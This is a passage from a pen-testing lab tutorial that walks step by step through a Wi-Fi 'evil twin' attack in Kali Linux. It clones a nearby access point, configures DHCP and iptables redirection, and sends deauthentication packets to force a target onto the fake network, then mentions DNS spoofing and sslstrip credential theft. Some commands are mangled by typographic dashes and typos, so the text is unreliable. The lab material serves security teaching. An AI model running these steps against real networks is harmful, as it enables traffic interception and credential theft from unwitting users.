2. Backtrack OS or Kali Linux: They are the Linux distributions and contain a lot of tools for pen testing. 3. A wireless Network: Make sure the user has access and control to one wireless access point. This exercise must not be practiced on other’s access point. 4. A target machine: This machine can be your local machine or a VM image. You can use Windows 7 VM image for this lab. Step 1: Launch the VMware Workstation and load the VM image of Kali Linux. Click on the “Edit virtual machine settings” link, go to “Network Adapter” section and select “Bridged” option under “Network connection” box.

Step 2: Launch Kali Linux and log in as the root user. The default username and password are root and toor, respectively. Step 3: Connect the wireless adapter to the laptop. The user should be able to see the wireless adapter under Removable Devices option with a blue tick mark. If tick mark is not present then, select the wireless adapter and select Connect. This will disconnect the wireless adapter from the Windows OS and connect to Kali. This is shown in the screenshot below.

Step 4: Launch a new terminal and enter the following command to check the IP address of the gateway. route -n

In our case, the gateway is 192.168.0.1 Step 5: To get the list of the network interface, type the following command, as shown in the following screenshot. airmon-ng We have got one interface with name wlan5. This may differ from machine to machine.

Step 6: Check what all access points are available near the user. Run the following command, as shown in the following screenshots. airodump-ng wlan5 This will start capturing the traffic and start showing the list of available access points near the user along with BSSID (MAC address of the access point) and Channel of the access points. Take a note of values under PWR column. The nearest router will have the least value.

Step 7: Note down the value of BSSID and Channel number of the access point that the user is interested in. Also, note down the MAC address of the target device. In our case, the BSSID value is 5E:F9:6A:29:28:18, Channel is 2 and target machine’s MAC id is 68:5D:43:7D:F7:E9. Step 8: We have to set up a DHCP server to provide the internet to the fake access point. Use the following command to install a DHCP server in Kali: apt-get install isc-dhcp-server After installation, use the following command to change the content of the dhcpd.conf file as given below. leafpad /etc/dhcpd.conf authoraitative; default-lease-time 600; max-lease-time 7200; subnet 192.168.1.0 netmask 255.255.255.0 { option routers 192.168.1.1; option subnet-mask 255.255.255.0; option domain-name “Epson_Printer”; option domain-name-servers 192.168.1.1; range 192.168.1.2 192.168.1.40; } Save and close the file. Repeat the above step for /etc/dhcpd/dhcpd.conf file as well. Step 9: Open a new terminal and use the following command to create a new access point with ESSID similar to our victim access point i.e. “Epson_Printer”. airbase-ng –e Epson_Printer -c 2 wlan5

e is ESSID (MAC address) of the access point. c is a channel for the wireless network. wlan5 is the interface name.

The new access point with name “Epson_Printer” is created now.

Step 10: Now we will open a new terminal and monitor the traffic on the newly created access point with the following command: airodump-ng –bssid 00:C0:CA:70:8F:25 -C 2 wlan 5

Step 11: Check the command window of step number 5. The newly created access point should be visible now.

Step 12: Now, we have to provide the internet to the fake access point. Open a new terminal and execute the following set of commands one after another.

ifconfig at0 192.168.1.1 netmask 255.255.255.0

ifconfig at0 mtu 1400

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

iptables –flush

iptables –table nat –flush

iptables –delete-chain

iptables –table nat –delete-chain

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1(gateway)

iptables -P FORWARD ACCEPT

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start

Step 13: Either we can wait for someone to connect to this fake access point or we can forcefully de-authenticate our connected target so that it will try to reconnect to the access point. We can use the following command to send the de-authentication packets: aireplay-ng –deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5

5E:F9:6A:29:28:18 is the MAC address of the access point. 0 is de-authentication. -c is the MAC address of the target machine. wlan5 is the interface name.

The following screenshot shows that the wireless adapter is sending the de-authentication packet to the given access point. The target machine is disconnected with the “Epson_Printer” access point and trying to reconnect again, as shown in the following screenshot.

Step 14: Due to continuous deauth packets, the client is not able to reconnect to the original access point and automatically tries connecting to the fake access point which has stronger signal strength. This connection can be seen in the terminal open in step number 7.

Step 15: Check the airodump-ng command window running in the background. The connection of a device can be seen in the terminal open in step number 8 as well.

The victim device is connected to the fake access point now. From here an attacker can perform various attacks such as DNS spoofing to redirect the connected victim to the fake website and grab the credentials or using sslstrip and ettercap to perform MiTM (Man in The Middle) attack.